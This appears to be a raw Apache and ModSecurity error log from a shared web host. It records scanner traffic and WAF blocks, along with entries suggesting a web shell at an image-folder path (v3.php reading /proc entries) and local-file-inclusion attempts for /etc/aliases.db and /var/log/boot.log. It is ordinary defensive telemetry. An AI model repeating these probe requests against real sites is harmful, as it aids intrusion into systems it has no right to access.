[Mon May 11 17:23:13.866046 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:14.025726 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:14.189884 2026] [proxy_fcgi:error] [pid 1411099:tid 1411109] [client 54.241.173.61:52238] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.007908 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.050267 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.086472 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.122577 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.159143 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.196186 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.231229 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.266070 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.301111 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.336123 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.376436 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.411328 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.447529 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.483303 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.519721 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.556814 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.626357 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.661207 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.695972 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.730846 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.767758 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.802928 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.838570 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
[Mon May 11 17:23:38.873437 2026] [proxy_fcgi:error] [pid 1416109:tid 1416136] [client 52.236.68.31:11823] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /proc/562/task/562/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/562/task/562/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/562/task/562/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/562/task/562/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/562/task/562/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/562/task/562/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 17:24:38.869003 2026] [security2:error] [pid 1411099:tid 1411115] [client 129.226.213.145:45550] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/"] [unique_id "agH0tg-Qm4vhlWBPlMjOowAAAA8"]
[Mon May 11 17:25:06.850514 2026] [core:error] [pid 1416109:tid 1416142] [client 74.7.228.23:54036] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:25:06.851204 2026] [core:error] [pid 1416109:tid 1416142] [client 74.7.228.23:54036] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:25:34.372332 2026] [authz_core:error] [pid 1424905:tid 1424913] [client 176.120.22.46:58829] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/error_log, referer: http://www.labaujue.com/wp-includes/
[Mon May 11 17:25:40.978639 2026] [authz_core:error] [pid 1424905:tid 1424931] [client 176.120.22.46:63635] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/ID3/error_log, referer: http://www.labaujue.com/wp-includes/ID3/
[Mon May 11 17:25:47.276064 2026] [authz_core:error] [pid 1412074:tid 1412085] [client 176.120.22.46:52449] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/IXR/error_log, referer: http://www.labaujue.com/wp-includes/IXR/
[Mon May 11 17:25:52.002264 2026] [security2:error] [pid 1424905:tid 1424908] [client 106.54.62.156:48262] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ixinabourgoin.fr"] [uri "/"] [unique_id "agH1AIW8yzYoWG_eyCWsFwAAAUA"]
[Mon May 11 17:25:55.165408 2026] [security2:error] [pid 1424905:tid 1424932] [client 216.73.216.110:16497] ModSecurity: Warning. Matched phrase "var/log/boot.log" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/boot.log found within ARGS:filesrc: /var/log/boot.log-20211002"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH1A4W8yzYoWG_eyCWsIgAAAVg"]
[Mon May 11 17:25:55.166812 2026] [security2:error] [pid 1424905:tid 1424932] [client 216.73.216.110:16497] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH1A4W8yzYoWG_eyCWsIgAAAVg"]
[Mon May 11 17:25:55.261721 2026] [security2:error] [pid 1424905:tid 1424932] [client 216.73.216.110:16497] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH1A4W8yzYoWG_eyCWsIgAAAVg"]
[Mon May 11 17:25:59.204988 2026] [security2:error] [pid 1411055:tid 1411073] [client 43.157.168.43:42896] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agH1B0WKUxpmnkK7zHyTSwAAARA"]
[Mon May 11 17:25:59.894621 2026] [authz_core:error] [pid 1411099:tid 1411292] [client 176.120.22.46:62182] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/error_log, referer: http://www.labaujue.com/wp-includes/Requests/
[Mon May 11 17:26:02.598881 2026] [security2:error] [pid 1412074:tid 1412096] [client 43.157.168.43:43960] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agH1CjJnyuKVXoStDhbKBAAAAFQ"], referer: http://castiglionecorporatefinance.fr
[Mon May 11 17:26:04.892035 2026] [autoindex:error] [pid 1412074:tid 1412080] [client 20.56.20.8:60589] AH01276: Cannot serve directory /home/giloursf/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 17:26:06.158287 2026] [authz_core:error] [pid 1424905:tid 1424921] [client 176.120.22.46:50536] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/library/error_log, referer: http://www.labaujue.com/wp-includes/Requests/library/
[Mon May 11 17:26:07.453044 2026] [security2:error] [pid 1411099:tid 1411124] [client 43.157.168.43:54474] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agH1Dw-Qm4vhlWBPlMjPDQAAABg"], referer: https://castiglionecorporatefinance.fr/
[Mon May 11 17:26:12.603263 2026] [authz_core:error] [pid 1416109:tid 1416143] [client 176.120.22.46:55198] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/src/error_log, referer: http://www.labaujue.com/wp-includes/Requests/src/
[Mon May 11 17:26:20.678208 2026] [authz_core:error] [pid 1411201:tid 1411255] [client 176.120.22.46:60360] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/src/Auth/error_log, referer: http://www.labaujue.com/wp-includes/Requests/src/Auth/
[Mon May 11 17:26:35.223186 2026] [authz_core:error] [pid 1411099:tid 1411117] [client 176.120.22.46:56557] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/src/Exception/error_log, referer: http://www.labaujue.com/wp-includes/Requests/src/Exception/
[Mon May 11 17:26:37.319864 2026] [security2:error] [pid 1424905:tid 1424914] [client 175.27.163.171:58114] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rixonephotography.com"] [uri "/"] [unique_id "agH1LYW8yzYoWG_eyCWsfAAAAUY"]
[Mon May 11 17:26:42.077426 2026] [authz_core:error] [pid 1411201:tid 1411264] [client 176.120.22.46:61584] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/src/Proxy/error_log, referer: http://www.labaujue.com/wp-includes/Requests/src/Proxy/
[Mon May 11 17:26:42.398848 2026] [autoindex:error] [pid 1411201:tid 1411248] [client 20.56.20.8:63317] AH01276: Cannot serve directory /home/giloursf/public_html/.well-known/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Mon May 11 17:26:48.446059 2026] [authz_core:error] [pid 1424905:tid 1424910] [client 176.120.22.46:50458] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/src/Response/error_log, referer: http://www.labaujue.com/wp-includes/Requests/src/Response/
[Mon May 11 17:26:49.959319 2026] [security2:error] [pid 1412074:tid 1412091] [client 175.27.163.171:57690] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agH1OTJnyuKVXoStDhbKMgAAAE8"], referer: http://www.rixonephotography.com
[Mon May 11 17:26:50.423102 2026] [ssl:error] [pid 1424905:tid 1424908] (EAI 2)Name or service not known: [client 178.170.14.75:55906] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:26:50.423302 2026] [ssl:error] [pid 1424905:tid 1424908] AH01941: stapling_renew_response: responder error
[Mon May 11 17:26:54.735339 2026] [authz_core:error] [pid 1416109:tid 1416134] [client 176.120.22.46:55068] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/src/Transport/error_log, referer: http://www.labaujue.com/wp-includes/Requests/src/Transport/
[Mon May 11 17:27:03.985398 2026] [security2:error] [pid 1416109:tid 1416135] [client 216.73.216.110:5791] ModSecurity: Warning. Matched phrase "etc/alias" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/alias found within ARGS:filesrc: /etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH1R1V4kyjgo4bQBUhrSAAAAMU"]
[Mon May 11 17:27:03.986562 2026] [security2:error] [pid 1416109:tid 1416135] [client 216.73.216.110:5791] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agH1R1V4kyjgo4bQBUhrSAAAAMU"]
[Mon May 11 17:27:04.078088 2026] [security2:error] [pid 1416109:tid 1416135] [client 216.73.216.110:5791] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH1R1V4kyjgo4bQBUhrSAAAAMU"]
[Mon May 11 17:27:07.280911 2026] [authz_core:error] [pid 1424905:tid 1424924] [client 176.120.22.46:64648] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/SimplePie/error_log, referer: http://www.labaujue.com/wp-includes/SimplePie/
[Mon May 11 17:27:13.555863 2026] [authz_core:error] [pid 1412074:tid 1412078] [client 176.120.22.46:52911] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/SimplePie/Cache/error_log, referer: http://www.labaujue.com/wp-includes/SimplePie/Cache/
[Mon May 11 17:28:19.324202 2026] [security2:error] [pid 1424905:tid 1424924] [client 43.157.168.43:40796] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agH1k4W8yzYoWG_eyCWs5QAAAVA"]
[Mon May 11 17:28:30.046395 2026] [security2:error] [pid 1411055:tid 1411073] [client 43.157.168.43:54870] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agH1nkWKUxpmnkK7zHyUUwAAARA"], referer: http://www.pole-de-mobilite-regional.com
[Mon May 11 17:28:33.386330 2026] [security2:error] [pid 1416109:tid 1416133] [client 43.157.168.43:33756] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agH1oVV4kyjgo4bQBUhr3gAAAMM"], referer: https://www.pole-de-mobilite-regional.com/
[Mon May 11 17:28:49.833118 2026] [authz_core:error] [pid 1416109:tid 1416147] [client 176.120.22.46:63358] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/block-bindings/error_log, referer: http://www.labaujue.com/wp-includes/block-bindings/
[Mon May 11 17:28:56.090458 2026] [authz_core:error] [pid 1411055:tid 1411064] [client 176.120.22.46:51826] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/block-patterns/error_log, referer: http://www.labaujue.com/wp-includes/block-patterns/
[Mon May 11 17:29:02.379495 2026] [authz_core:error] [pid 1416109:tid 1416131] [client 176.120.22.46:56689] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/block-supports/error_log, referer: http://www.labaujue.com/wp-includes/block-supports/
[Mon May 11 17:29:49.487922 2026] [:error] [pid 1416109:tid 1416153] [client 135.232.201.48:58318] File does not exist: /home/pweilcom/public_html/xmlrpc.php
[Mon May 11 17:30:47.435139 2026] [authz_core:error] [pid 1411055:tid 1411080] [client 47.128.58.75:62574] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/html-api/error_log
[Mon May 11 17:31:20.569934 2026] [authz_core:error] [pid 1411201:tid 1411253] [client 176.120.22.46:60006] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/customize/error_log, referer: http://www.labaujue.com/wp-includes/customize/
[Mon May 11 17:31:33.100241 2026] [authz_core:error] [pid 1416109:tid 1416144] [client 176.120.22.46:55626] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/html-api/error_log, referer: http://www.labaujue.com/wp-includes/html-api/
[Mon May 11 17:32:04.423784 2026] [authz_core:error] [pid 1411055:tid 1411077] [client 176.120.22.46:65509] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/interactivity-api/error_log, referer: http://www.labaujue.com/wp-includes/interactivity-api/
[Mon May 11 17:32:07.000752 2026] [ssl:error] [pid 1411055:tid 1411081] (EAI 2)Name or service not known: [client 18.158.189.225:19678] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:07.000970 2026] [ssl:error] [pid 1411055:tid 1411081] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:07.064750 2026] [ssl:error] [pid 1412074:tid 1412085] (EAI 2)Name or service not known: [client 18.157.252.152:63752] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:07.064790 2026] [ssl:error] [pid 1412074:tid 1412085] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:07.151399 2026] [ssl:error] [pid 1411099:tid 1411292] (EAI 2)Name or service not known: [client 18.192.252.214:17058] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:07.151448 2026] [ssl:error] [pid 1411099:tid 1411292] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:07.231803 2026] [ssl:error] [pid 1424905:tid 1424912] (EAI 2)Name or service not known: [client 18.192.172.225:12345] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:07.231879 2026] [ssl:error] [pid 1424905:tid 1424912] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:07.278717 2026] [ssl:error] [pid 1411055:tid 1411061] (EAI 2)Name or service not known: [client 18.159.199.77:29164] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:07.278743 2026] [ssl:error] [pid 1411055:tid 1411061] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:07.316268 2026] [ssl:error] [pid 1412074:tid 1412097] (EAI 2)Name or service not known: [client 3.127.31.193:18385] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:07.316304 2026] [ssl:error] [pid 1412074:tid 1412097] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:07.395409 2026] [ssl:error] [pid 1411201:tid 1411269] (EAI 2)Name or service not known: [client 18.159.93.15:1185] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:07.395457 2026] [ssl:error] [pid 1411201:tid 1411269] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:07.487235 2026] [ssl:error] [pid 1412074:tid 1412086] (EAI 2)Name or service not known: [client 18.157.252.152:25719] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:07.487261 2026] [ssl:error] [pid 1412074:tid 1412086] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:54.916013 2026] [ssl:error] [pid 1411201:tid 1411254] (EAI 2)Name or service not known: [client 216.157.42.83:61556] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:54.916169 2026] [ssl:error] [pid 1411201:tid 1411254] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:55.704587 2026] [ssl:error] [pid 1412074:tid 1412087] (EAI 2)Name or service not known: [client 216.157.42.74:33217] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:55.704613 2026] [ssl:error] [pid 1412074:tid 1412087] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:56.774285 2026] [ssl:error] [pid 1412074:tid 1412083] (EAI 2)Name or service not known: [client 216.157.42.94:48053] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:56.774317 2026] [ssl:error] [pid 1412074:tid 1412083] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:57.844340 2026] [ssl:error] [pid 1411099:tid 1411114] (EAI 2)Name or service not known: [client 216.157.42.75:34200] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:57.844388 2026] [ssl:error] [pid 1411099:tid 1411114] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:58.384592 2026] [ssl:error] [pid 1416109:tid 1416136] (EAI 2)Name or service not known: [client 216.157.42.74:44695] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:58.384639 2026] [ssl:error] [pid 1416109:tid 1416136] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:58.939187 2026] [ssl:error] [pid 1411201:tid 1411267] (EAI 2)Name or service not known: [client 216.157.42.79:45085] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
